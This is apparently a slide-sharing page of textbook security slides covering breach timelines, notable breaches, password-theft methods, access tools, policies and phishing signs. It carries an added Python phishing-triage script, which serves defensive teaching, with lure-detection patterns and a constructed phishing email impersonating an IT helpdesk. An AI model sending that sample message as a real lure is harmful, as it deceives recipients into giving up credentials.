Managing and Using Information Systems:
A Strategic Approach – Sixth Edition
Keri Pearlson, Carol Saunders,
and Dennis Galletta
© Copyright 2016
John Wiley & Sons, Inc.
Chapter 7
Security
Opening Case
• What are some important lessons from the
opening case?
• How long did the theft take? How did the theft
likely occur?
• How long did it take Office of Personnel
Management (OPM) to detect the theft?
• How damaging are the early reports of the data
theft for the OPM?
© 2016 John Wiley & Sons, Inc. 3
How Long Does it Take?
• How long do you think it usually takes for
someone to discover a security compromise in a
system after the evidence shows up?
A. Several seconds
B. Several minutes
C. Several hours
D. Several days
E. Several months
A Mandiant study revealed
that the median for 2014
was 205 days! That’s almost
7 months!
The record is 2,982 which is
11 years!
Timeline of a Breach - Fantasy
• Hollywood has a fairly consistent script:
• 0: Crooks get password and locate the file
• Minute 1: Crooks start downloading data and
destroying the original
• Minute 2: Officials sense the breach
• Minute 3: Officials try to block the breach
• Minute 4: Crooks’ download completes
• Minute 5: Officials lose all data
Source: http://www.verizonbusiness.com/resources/reports/rp_2010-DBIR-combined-reports_en_xg.pdf
Timeline of a Breach - Reality
Source: http://www.verizonbusiness.com/resources/reports/rp_2010-DBIR-combined-reports_en_xg.pdf
IT Security Decision Framework
Each decision is listed with who is responsible, why, and what happens otherwise.
Information Security Strategy
• Who is responsible: Business Leaders
• Why? They know business strategies
• Otherwise? Security is an afterthought and patched on
Information Security Infrastructure
• Who is responsible: IT Leaders
• Why? Technical knowledge is needed
• Otherwise? Incorrect infrastructure decisions
Information Security Policy
• Who is responsible: IT and Business Leaders (shared)
• Why? Trade-offs need to be handled correctly
• Otherwise? Unenforceable policies that don’t fit the IT and the users
SETA (training)
• Who is responsible: IT and Business Leaders (shared)
• Why? Business buy-in and technical correctness
• Otherwise? Insufficient training; errors
Information Security Investments
• Who is responsible: IT and Business Leaders (shared)
• Why? Evaluation of business goals and technical requirements
• Otherwise? Over- or under-investment in security
How Have Big Breaches Occurred?
Each row gives the date detected, the company, what was stolen, and how.
November 2013 – Target
• What was stolen: 40 million credit & debit cards
• How: Contractor opened virus-laden email attachment
May 2014 – eBay #1
• What was stolen: 145 million user names, physical addresses, phones, birthdays, encrypted passwords
• How: Employee’s password obtained
September 2014 – eBay #2
• What was stolen: Small but unknown
• How: Cross-site scripting
September 2014 – Home Depot
• What was stolen: 56 million credit card numbers; 53 million email addresses
• How: Obtaining a vendor’s password / exploiting OS vulnerability
January 2015 – Anthem Blue Cross
• What was stolen: 80 million names, birthdays, emails, Social Security numbers, addresses, and employment data
• How: Obtaining passwords from 5 or more high-level employees
Password Breaches
• 80% of breaches are caused by stealing a
password.
• You can steal a password by:
• Phishing attack
• Key logger (hardware or software)
• Guessing weak passwords (123456 is most common)
• Evil twin wifi
Insecurity of WiFi – a Dutch study
• “We took a hacker to a café and, in 20 minutes, he
knew where everyone else was born, what schools
they attended, and the last five things they googled.”
• Had WiFi transmitter broadcasting “Starbucks” as ID
• Because they were connected to him, he scanned for
unpatched or vulnerable mobile devices or laptops
• He also saw passwords and could lock them out of
their own accounts.
• The correspondent: “I will never again be connecting
to an insecure public WiFi network without taking
security measures.”
Other Approaches
• Cross-site scripting (malicious code pointing
to a link requiring log-in at an imposter site)
• Third parties
• Target’s HVAC system was connected to main
systems
• Contractors had access
• Hackers gained contractors’ password
• Malware captured customer credit card info
before it could be encrypted
Cost of Breaches
• Estimated at $145 to $154 per stolen record
• Revenue lost when sales decline
• Some costs can be recouped by insurance
Can You be Safe?
• No, unless the information is permanently
inaccessible
• “You cannot make a computer secure” – from Dain Gary,
former CERT chief
• 97% of all firms have been breached
• Sometimes security makes systems less usable
What Motivates the Hackers?
• Sell stolen credit card numbers for up to $50 each
• 2 million Target card numbers were sold for $20 each
on average
• Street gang members can usually get $400 out of a
card
• Some “kits” (card number plus SSN plus medical
information) sell for up to $1,000
• They allow opening new account cards
• Stolen cards can be sold for bitcoin on the Deep Web
What Should Management Do?
• Security strategy
• Infrastructure
• Access tools *
• Storage and transmission tools *
• Security policies *
• Training *
• Investments
* Described next
Access Tools
Each access tool is listed with its ubiquity, advantages, and disadvantages.
Physical locks (ubiquity: very high)
• Advantages: Excellent if guarded
• Disadvantages: Locks can be picked; physical access is often not needed; keys can be lost
Passwords (ubiquity: very high)
• Advantages: User acceptance and familiarity; ease of use; mature practices
• Disadvantages: Poor by themselves; sometimes forgotten; sometimes stolen from users using deception or key loggers
Biometrics (ubiquity: medium)
• Advantages: Can be reliable; never forgotten; cannot be stolen; can be inexpensive
• Disadvantages: False positives/negatives; some are expensive; some might change (e.g., voice); lost limbs; loopholes (e.g., photo)
Access Tools (continued)
Challenge questions (ubiquity: medium; high in banking)
• Advantages: Not forgotten; multitude of questions can be used
• Disadvantages: Social networking might reveal some answers; personal knowledge of an individual might reveal the answers; spelling might not be consistent
Token (ubiquity: low)
• Advantages: Stolen passkey is useless quickly
• Disadvantages: Requires carrying a device
Text message (ubiquity: medium)
• Advantages: Stolen passkey is useless; mobile phone already owned by users; useful as a secondary mechanism too
• Disadvantages: Requires mobile phone ownership by all users; home phone option requires speech synthesis; requires alternative access control if mobile phone lost
Multi-factor authentication (ubiquity: medium)
• Advantages: Stolen password is useless; enhanced security
• Disadvantages: Requires an additional technique if one of the two fails; temptation for easy password
Storage and Transmission Tools
Each tool is listed with its ubiquity, advantages, and disadvantages.
Antivirus/antispyware (ubiquity: very high)
• Advantages: Blocks many known threats; blocks some “zero-day” threats
• Disadvantages: Slows down the operating system; “zero-day” threats can be missed
Firewall (ubiquity: high)
• Advantages: Can prevent some targeted traffic
• Disadvantages: Can only filter known threats; can have well-known “holes”
System logs (ubiquity: very high)
• Advantages: Can reveal IP address of attacker; can estimate the extent of the breach
• Disadvantages: Hackers can conceal their IP address; hackers can delete logs; logs can be huge; irregular inspections
System alerts (ubiquity: high)
• Advantages: Can help point to logs; can detect an attack in process
• Disadvantages: High sensitivity; low selectivity
Storage and Transmission Tools (continued)
Encryption (ubiquity: very high)
• Advantages: Difficult to access a file without the key; long keys could take years to break
• Disadvantages: Keys are unnecessary if password is known; if the key is not strong, hackers could uncover it by trial and error
WEP/WPA (ubiquity: very high)
• Advantages: Same as encryption; most devices have the capability; provides secure wifi connection
• Disadvantages: Same as encryption; some older devices have limited protections; WEP is not secure, yet it is still provided
VPN (ubiquity: medium)
• Advantages: Trusted connection is as if you were connected on site; hard to decrypt
• Disadvantages: Device could be stolen while connected; sometimes slows the connection
Security Policies
• Perform security updates promptly
• Separate unrelated networks
• Keep passwords secret
• Manage mobile devices (BYOD)
• Formulate data policies (retention and disposal)
• Manage social media (rules as to what can be shared,
how to identify yourself)
• Use consultants (Managed Security Services Providers)
SETA (Security Education, Training,
and Awareness)
• Training on access tools
• Limitations of passwords
• Formulating a password
• Changing passwords periodically
• Using multi-factor authentication
• Using password managers
SETA (Security Education, Training,
and Awareness)
• BYOD
• Rules
• How to follow them
• Social Media
• Rules
• How to follow them
• Cases from the past that created problems
SETA (Security Education, Training,
and Awareness)
• Vigilance: Recognizing:
• Bogus warning messages
• Phishing emails
• Physical intrusions
• Ports and access channels to examine
Classic Signs of Phishing
• Account is being closed
• Email in-box is full
• Winning a contest or lottery
• Inheritance or commission to handle funds
• Product delivery failed
• Odd URL when hovering
• Familiar name but strange email address
• Poor grammar/spelling
• Impossibly low prices
• Attachment with EXE, ZIP, or BAT (etc.)
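A defender-side triage of the signs listed above, written as an added example (not code from the textbook or its authors): each check maps to one sign on the slide, and the sample messages, the KNOWN_SENDERS address book, and the lure regexes are constructed assumptions for illustration.

```python
"""Score an email against the 'Classic Signs of Phishing' list."""
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed address book (assumption): trusted display names and the
# domain their mail is expected to come from.
KNOWN_SENDERS = {
    "payroll department": "example-corp.com",
    "it helpdesk": "example-corp.com",
}

# Lure themes from the slide; the regexes are this example's own.
LURE_PATTERNS = {
    "account is being closed": r"account\s+(will be|is being|has been)\s+(closed|suspended|locked)",
    "email in-box is full": r"(mailbox|in-?box)\s+(is\s+)?(full|over quota)",
    "winning a contest or lottery": r"\b(you have won|winner|lottery|prize)\b",
    "inheritance or commission": r"\b(inheritance|next of kin|commission)\b",
    "product delivery failed": r"(delivery|parcel|package)\b.{0,40}\b(failed|could not be delivered)",
    "impossibly low prices": r"\b(9\d)% off\b",
}
RISKY_EXTENSIONS = (".exe", ".zip", ".bat")  # the three named on the slide


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    """Normalise a URL or bare domain to its lower-cased host name."""
    netloc = urlparse(url if "://" in url else "http://" + url).netloc
    return netloc.lower().split("@")[-1].split(":")[0]


def check_sender(from_header):
    """'Familiar name but strange email address'."""
    name, addr = parseaddr(from_header)
    domain = addr.rsplit("@", 1)[-1].lower()
    expected = KNOWN_SENDERS.get(name.strip().lower())
    if expected and domain != expected:
        return [f"familiar name '{name}' but address domain '{domain}'"]
    return []


def check_links(html_body):
    """'Odd URL when hovering': visible text names one host, href another."""
    parser = LinkCollector()
    parser.feed(html_body)
    findings = []
    for href, text in parser.links:
        looks_like_domain = re.search(r"[A-Za-z0-9-]+\.[A-Za-z]{2,}", text)
        if looks_like_domain and _host(text) != _host(href):
            findings.append(f"link text '{text}' points to '{_host(href)}'")
    return findings


def check_lures(text):
    """Lure themes from the slide, matched case-insensitively."""
    lowered = text.lower()
    return [f"lure: {label}" for label, pat in LURE_PATTERNS.items()
            if re.search(pat, lowered)]


def check_attachments(filenames):
    """'Attachment with EXE, ZIP, or BAT'."""
    return [f"risky attachment '{f}'" for f in filenames
            if f.lower().endswith(RISKY_EXTENSIONS)]


def triage(message):
    """Return the matched signs and a score of one point per sign."""
    signs = (check_sender(message["from"])
             + check_links(message["body_html"])
             + check_lures(message["subject"] + " " + message["body_text"])
             + check_attachments(message.get("attachments", [])))
    return {"score": len(signs), "signs": signs}


# Constructed sample messages (not real mail).
SUSPICIOUS = {
    "from": "IT Helpdesk <helpdesk@example-corp-login.net>",
    "subject": "Your account will be closed in 24 hours",
    "body_text": "Your mailbox is full. Verify at example-corp.com/verify now.",
    "body_html": '<p>Verify at <a href="http://example-corp-login.net/v">example-corp.com/verify</a></p>',
    "attachments": ["invoice.zip"],
}
LEGIT = {
    "from": "Payroll Department <payroll@example-corp.com>",
    "subject": "June payslips available",
    "body_text": "Payslips are on the intranet portal.",
    "body_html": '<p>See <a href="https://intranet.example-corp.com/pay">intranet.example-corp.com/pay</a></p>',
    "attachments": [],
}
```

Run `triage(SUSPICIOUS)` and `triage(LEGIT)` to see five signs fire on the first message and none on the second; the score is a triage aid for a reviewer, not a verdict.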

More Related Content

Similar to ch07-Security.pptx

itsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdfitsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdf
MansoorAhmed57263
 
csa2014 IBC
csa2014 IBCcsa2014 IBC
csa2014 IBCapyn
 
Personal Threat Models
Personal Threat ModelsPersonal Threat Models
Personal Threat Models
Geoffrey Vaughan
 
Cyberattacks.pptx
Cyberattacks.pptxCyberattacks.pptx
Cyberattacks.pptx
SonakshiMundra
 
Using Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber SecurityUsing Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber Security
Stephen Cobb
 
CCIAOR Cyber Security Forum
CCIAOR Cyber Security ForumCCIAOR Cyber Security Forum
CCIAOR Cyber Security Forum
CCIAOR
 
Security in the News
Security in the NewsSecurity in the News
Security in the NewsJames Sutter
 
Internet Security is an Oxymoron
Internet Security is an OxymoronInternet Security is an Oxymoron
Internet Security is an Oxymoron
Max Nokhrin
 
2014 ota databreach3
2014 ota databreach32014 ota databreach3
2014 ota databreach3Meg Weber
 
Users awarness programme for Online Privacy
Users awarness programme for Online PrivacyUsers awarness programme for Online Privacy
Users awarness programme for Online Privacy
Kazi Sarwar Hossain
 
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access ControlStopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
SecureAuth
 
Forensic And Cloud Computing
Forensic And Cloud ComputingForensic And Cloud Computing
Forensic And Cloud Computing
Mitesh Katira
 
The Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 editionThe Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 edition
Stephen Cobb
 
Executive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdfExecutive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdf
TechSoup
 
The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.
Teri Radichel
 
Cyber Security for Financial Planners
Cyber Security for Financial PlannersCyber Security for Financial Planners
Cyber Security for Financial Planners
Michael O'Phelan
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
Mohan Jadhav
 
Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....
Abzetdin Adamov
 
12990739.ppt
12990739.ppt12990739.ppt
12990739.ppt
MuhammadShahidulIsla8
 

Similar to ch07-Security.pptx (20)

itsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdfitsecurityawareness-v1-230413174238-5e7cba3c.pdf
itsecurityawareness-v1-230413174238-5e7cba3c.pdf
 
csa2014 IBC
csa2014 IBCcsa2014 IBC
csa2014 IBC
 
Personal Threat Models
Personal Threat ModelsPersonal Threat Models
Personal Threat Models
 
Judy Taylour's Digital Privacy Day 2014 Presentation
Judy Taylour's Digital Privacy Day 2014 PresentationJudy Taylour's Digital Privacy Day 2014 Presentation
Judy Taylour's Digital Privacy Day 2014 Presentation
 
Cyberattacks.pptx
Cyberattacks.pptxCyberattacks.pptx
Cyberattacks.pptx
 
Using Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber SecurityUsing Technology and People to Improve your Threat Resistance and Cyber Security
Using Technology and People to Improve your Threat Resistance and Cyber Security
 
CCIAOR Cyber Security Forum
CCIAOR Cyber Security ForumCCIAOR Cyber Security Forum
CCIAOR Cyber Security Forum
 
Security in the News
Security in the NewsSecurity in the News
Security in the News
 
Internet Security is an Oxymoron
Internet Security is an OxymoronInternet Security is an Oxymoron
Internet Security is an Oxymoron
 
2014 ota databreach3
2014 ota databreach32014 ota databreach3
2014 ota databreach3
 
Users awarness programme for Online Privacy
Users awarness programme for Online PrivacyUsers awarness programme for Online Privacy
Users awarness programme for Online Privacy
 
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access ControlStopping Breaches at the Perimeter: Strategies for Secure Access Control
Stopping Breaches at the Perimeter: Strategies for Secure Access Control
 
Forensic And Cloud Computing
Forensic And Cloud ComputingForensic And Cloud Computing
Forensic And Cloud Computing
 
The Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 editionThe Year Ahead in Cyber Security: 2014 edition
The Year Ahead in Cyber Security: 2014 edition
 
Executive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdfExecutive Directors Chat:It's easy to stay safe online.pdf
Executive Directors Chat:It's easy to stay safe online.pdf
 
The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.The Threat Is Real. Protect Yourself.
The Threat Is Real. Protect Yourself.
 
Cyber Security for Financial Planners
Cyber Security for Financial PlannersCyber Security for Financial Planners
Cyber Security for Financial Planners
 
Information Technology Security Basics
Information Technology Security BasicsInformation Technology Security Basics
Information Technology Security Basics
 
Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....Steps and Tips to Protect Yourself and your Private Information while Online....
Steps and Tips to Protect Yourself and your Private Information while Online....
 
12990739.ppt
12990739.ppt12990739.ppt
12990739.ppt
 

More from LuckySaigon1

C03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.pptC03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.ppt
LuckySaigon1
 
ABPMP BOK Overview.ppt
ABPMP BOK Overview.pptABPMP BOK Overview.ppt
ABPMP BOK Overview.ppt
LuckySaigon1
 
ch08-Modeling & Simulation.ppt
ch08-Modeling & Simulation.pptch08-Modeling & Simulation.ppt
ch08-Modeling & Simulation.ppt
LuckySaigon1
 
ch06-Queuing & Simulation.ppt
ch06-Queuing & Simulation.pptch06-Queuing & Simulation.ppt
ch06-Queuing & Simulation.ppt
LuckySaigon1
 
ch03-Design Project.ppt
ch03-Design Project.pptch03-Design Project.ppt
ch03-Design Project.ppt
LuckySaigon1
 
ch02-Improvement Program.ppt
ch02-Improvement Program.pptch02-Improvement Program.ppt
ch02-Improvement Program.ppt
LuckySaigon1
 
ch09-Simulation.ppt
ch09-Simulation.pptch09-Simulation.ppt
ch09-Simulation.ppt
LuckySaigon1
 
ch07-Extend.ppt
ch07-Extend.pptch07-Extend.ppt
ch07-Extend.ppt
LuckySaigon1
 
ch01-Design.ppt
ch01-Design.pptch01-Design.ppt
ch01-Design.ppt
LuckySaigon1
 
ch05-Flows.ppt
ch05-Flows.pptch05-Flows.ppt
ch05-Flows.ppt
LuckySaigon1
 
ch10-Optimizing.ppt
ch10-Optimizing.pptch10-Optimizing.ppt
ch10-Optimizing.ppt
LuckySaigon1
 
2014-Dascalu_BPM.ppt
2014-Dascalu_BPM.ppt2014-Dascalu_BPM.ppt
2014-Dascalu_BPM.ppt
LuckySaigon1
 

More from LuckySaigon1 (12)

C03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.pptC03-BPM03_UT-BPMN_Ex.ppt
C03-BPM03_UT-BPMN_Ex.ppt
 
ABPMP BOK Overview.ppt
ABPMP BOK Overview.pptABPMP BOK Overview.ppt
ABPMP BOK Overview.ppt
 
ch08-Modeling & Simulation.ppt
ch08-Modeling & Simulation.pptch08-Modeling & Simulation.ppt
ch08-Modeling & Simulation.ppt
 
ch06-Queuing & Simulation.ppt
ch06-Queuing & Simulation.pptch06-Queuing & Simulation.ppt
ch06-Queuing & Simulation.ppt
 
ch03-Design Project.ppt
ch03-Design Project.pptch03-Design Project.ppt
ch03-Design Project.ppt
 
ch02-Improvement Program.ppt
ch02-Improvement Program.pptch02-Improvement Program.ppt
ch02-Improvement Program.ppt
 
ch09-Simulation.ppt
ch09-Simulation.pptch09-Simulation.ppt
ch09-Simulation.ppt
 
ch07-Extend.ppt
ch07-Extend.pptch07-Extend.ppt
ch07-Extend.ppt
 
ch01-Design.ppt
ch01-Design.pptch01-Design.ppt
ch01-Design.ppt
 
ch05-Flows.ppt
ch05-Flows.pptch05-Flows.ppt
ch05-Flows.ppt
 
ch10-Optimizing.ppt
ch10-Optimizing.pptch10-Optimizing.ppt
ch10-Optimizing.ppt
 
2014-Dascalu_BPM.ppt
2014-Dascalu_BPM.ppt2014-Dascalu_BPM.ppt
2014-Dascalu_BPM.ppt
 

Recently uploaded

falcon-invoice-discounting-a-premier-platform-for-investors-in-india
falcon-invoice-discounting-a-premier-platform-for-investors-in-indiafalcon-invoice-discounting-a-premier-platform-for-investors-in-india
falcon-invoice-discounting-a-premier-platform-for-investors-in-india
Falcon Invoice Discounting
 
Creative Web Design Company in Singapore
Creative Web Design Company in SingaporeCreative Web Design Company in Singapore
Creative Web Design Company in Singapore
techboxsqauremedia
 
FINAL PRESENTATION.pptx12143241324134134
FINAL PRESENTATION.pptx12143241324134134FINAL PRESENTATION.pptx12143241324134134
FINAL PRESENTATION.pptx12143241324134134
LR1709MUSIC
 
Recruiting in the Digital Age: A Social Media Masterclass
Recruiting in the Digital Age: A Social Media MasterclassRecruiting in the Digital Age: A Social Media Masterclass
Recruiting in the Digital Age: A Social Media Masterclass
LuanWise
 
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdfikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
agatadrynko
 
What is the TDS Return Filing Due Date for FY 2024-25.pdf
What is the TDS Return Filing Due Date for FY 2024-25.pdfWhat is the TDS Return Filing Due Date for FY 2024-25.pdf
What is the TDS Return Filing Due Date for FY 2024-25.pdf
seoforlegalpillers
 
5 Things You Need To Know Before Hiring a Videographer
5 Things You Need To Know Before Hiring a Videographer5 Things You Need To Know Before Hiring a Videographer
5 Things You Need To Know Before Hiring a Videographer
ofm712785
 
Discover the innovative and creative projects that highlight my journey throu...
Discover the innovative and creative projects that highlight my journey throu...Discover the innovative and creative projects that highlight my journey throu...
Discover the innovative and creative projects that highlight my journey throu...
dylandmeas
 
Project File Report BBA 6th semester.pdf
Project File Report BBA 6th semester.pdfProject File Report BBA 6th semester.pdf
Project File Report BBA 6th semester.pdf
RajPriye
 
The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...
Adam Smith
 
Kseniya Leshchenko: Shared development support service model as the way to ma...
Kseniya Leshchenko: Shared development support service model as the way to ma...Kseniya Leshchenko: Shared development support service model as the way to ma...
Kseniya Leshchenko: Shared development support service model as the way to ma...
Lviv Startup Club
 
Cracking the Workplace Discipline Code Main.pptx
Cracking the Workplace Discipline Code Main.pptxCracking the Workplace Discipline Code Main.pptx
Cracking the Workplace Discipline Code Main.pptx
Workforce Group
 
Introduction to Amazon company 111111111111
Introduction to Amazon company 111111111111Introduction to Amazon company 111111111111
Introduction to Amazon company 111111111111
zoyaansari11365
 
Cree_Rey_BrandIdentityKit.PDF_PersonalBd
Cree_Rey_BrandIdentityKit.PDF_PersonalBdCree_Rey_BrandIdentityKit.PDF_PersonalBd
Cree_Rey_BrandIdentityKit.PDF_PersonalBd
creerey
 
LA HUG - Video Testimonials with Chynna Morgan - June 2024
LA HUG - Video Testimonials with Chynna Morgan - June 2024LA HUG - Video Testimonials with Chynna Morgan - June 2024
LA HUG - Video Testimonials with Chynna Morgan - June 2024
Lital Barkan
 
The key differences between the MDR and IVDR in the EU
The key differences between the MDR and IVDR in the EUThe key differences between the MDR and IVDR in the EU
The key differences between the MDR and IVDR in the EU
Allensmith572606
 
Premium MEAN Stack Development Solutions for Modern Businesses
Premium MEAN Stack Development Solutions for Modern BusinessesPremium MEAN Stack Development Solutions for Modern Businesses
Premium MEAN Stack Development Solutions for Modern Businesses
SynapseIndia
 
Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024
FelixPerez547899
 
Brand Analysis for an artist named Struan
Brand Analysis for an artist named StruanBrand Analysis for an artist named Struan
Brand Analysis for an artist named Struan
sarahvanessa51503
 
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdfSearch Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Arihant Webtech Pvt. Ltd
 

Recently uploaded (20)

falcon-invoice-discounting-a-premier-platform-for-investors-in-india
falcon-invoice-discounting-a-premier-platform-for-investors-in-indiafalcon-invoice-discounting-a-premier-platform-for-investors-in-india
falcon-invoice-discounting-a-premier-platform-for-investors-in-india
 
Creative Web Design Company in Singapore
Creative Web Design Company in SingaporeCreative Web Design Company in Singapore
Creative Web Design Company in Singapore
 
FINAL PRESENTATION.pptx12143241324134134
FINAL PRESENTATION.pptx12143241324134134FINAL PRESENTATION.pptx12143241324134134
FINAL PRESENTATION.pptx12143241324134134
 
Recruiting in the Digital Age: A Social Media Masterclass
Recruiting in the Digital Age: A Social Media MasterclassRecruiting in the Digital Age: A Social Media Masterclass
Recruiting in the Digital Age: A Social Media Masterclass
 
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdfikea_woodgreen_petscharity_cat-alogue_digital.pdf
ikea_woodgreen_petscharity_cat-alogue_digital.pdf
 
What is the TDS Return Filing Due Date for FY 2024-25.pdf
What is the TDS Return Filing Due Date for FY 2024-25.pdfWhat is the TDS Return Filing Due Date for FY 2024-25.pdf
What is the TDS Return Filing Due Date for FY 2024-25.pdf
 
5 Things You Need To Know Before Hiring a Videographer
5 Things You Need To Know Before Hiring a Videographer5 Things You Need To Know Before Hiring a Videographer
5 Things You Need To Know Before Hiring a Videographer
 
Discover the innovative and creative projects that highlight my journey throu...
Discover the innovative and creative projects that highlight my journey throu...Discover the innovative and creative projects that highlight my journey throu...
Discover the innovative and creative projects that highlight my journey throu...
 
Project File Report BBA 6th semester.pdf
Project File Report BBA 6th semester.pdfProject File Report BBA 6th semester.pdf
Project File Report BBA 6th semester.pdf
 
The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...The Influence of Marketing Strategy and Market Competition on Business Perfor...
The Influence of Marketing Strategy and Market Competition on Business Perfor...
 
Kseniya Leshchenko: Shared development support service model as the way to ma...
Kseniya Leshchenko: Shared development support service model as the way to ma...Kseniya Leshchenko: Shared development support service model as the way to ma...
Kseniya Leshchenko: Shared development support service model as the way to ma...
 
Cracking the Workplace Discipline Code Main.pptx
Cracking the Workplace Discipline Code Main.pptxCracking the Workplace Discipline Code Main.pptx
Cracking the Workplace Discipline Code Main.pptx
 
Introduction to Amazon company 111111111111
Introduction to Amazon company 111111111111Introduction to Amazon company 111111111111
Introduction to Amazon company 111111111111
 
Cree_Rey_BrandIdentityKit.PDF_PersonalBd
Cree_Rey_BrandIdentityKit.PDF_PersonalBdCree_Rey_BrandIdentityKit.PDF_PersonalBd
Cree_Rey_BrandIdentityKit.PDF_PersonalBd
 
LA HUG - Video Testimonials with Chynna Morgan - June 2024
LA HUG - Video Testimonials with Chynna Morgan - June 2024LA HUG - Video Testimonials with Chynna Morgan - June 2024
LA HUG - Video Testimonials with Chynna Morgan - June 2024
 
The key differences between the MDR and IVDR in the EU
The key differences between the MDR and IVDR in the EUThe key differences between the MDR and IVDR in the EU
The key differences between the MDR and IVDR in the EU
 
Premium MEAN Stack Development Solutions for Modern Businesses
Premium MEAN Stack Development Solutions for Modern BusinessesPremium MEAN Stack Development Solutions for Modern Businesses
Premium MEAN Stack Development Solutions for Modern Businesses
 
Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024Company Valuation webinar series - Tuesday, 4 June 2024
Company Valuation webinar series - Tuesday, 4 June 2024
 
Brand Analysis for an artist named Struan
Brand Analysis for an artist named StruanBrand Analysis for an artist named Struan
Brand Analysis for an artist named Struan
 
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdfSearch Disrupted Google’s Leaked Documents Rock the SEO World.pdf
Search Disrupted Google’s Leaked Documents Rock the SEO World.pdf
 

ch07-Security.pptx

  • 1. Managing and Using Information Systems: A Strategic Approach – Sixth Edition Keri Pearlson, Carol Saunders, and Dennis Galletta © Copyright 2016 John Wiley & Sons, Inc.
  • 3. Opening Case • What are some important lessons from the opening case? • How long did the theft take? How did the theft likely occur? • How long did it take Office of Personnel Management (OPM) to detect the theft? • How damaging are the early reports of the data theft for the OPM? © 2016 John Wiley & Sons, Inc. 3
  • 4. How Long Does it Take? • How long do you think it usually takes for someone to discover a security compromise in a system after the evidence shows up? A. Several seconds B. Several minutes C. Several hours D. Several days E. Several months A Mandiant study revealed that the median for 2014 was 205 days! That’s almost 7 months! The record is 2,982 which is 11 years! © 2016 John Wiley & Sons, Inc. 4
  • 5. Timeline of a Breach - Fantasy • Hollywood has a fairly consistent script: • 0: Crooks get password and locate the file • Minute 1: Crooks start downloading data and destroying the original • Minute 2: Officials sense the breach • Minute 3: Officials try to block the breach • Minute 4: Crooks’ download completes • Minute 5: Officials lose all data Source: http://www.verizonbusiness.com/resources/reports/rp_2010-DBIR-combined-reports_en_xg.pdf © 2016 John Wiley & Sons, Inc. 5
  • 6. Timeline of a Breach - Reality Source: http://www.verizonbusiness.com/resources/reports/rp_2010-DBIR-combined-reports_en_xg.pdf © 2016 John Wiley & Sons, Inc. 6
  • 7. IT Security Decision Framework Decision Who is Responsible Why? Otherwise? Information Security Strategy Business Leaders They know business strategies Security is an afterthought and patched on Information Security Infrastructure IT Leaders Technical knowledge is needed Incorrect infrastructure decisions Information Security Policy Shared: IT and Business Leaders Trade-offs need to be handled correctly Unenforceable policies that don’t fit the IT and the users SETA (training) Shared: IT and Business Leaders Business buy-in and technical correctness Insufficient training; errors Information Security Investments Shared: IT and Business Leaders Evaluation of business goals and technical requirements Over- or under- investment in security © 2016 John Wiley & Sons, Inc. 7
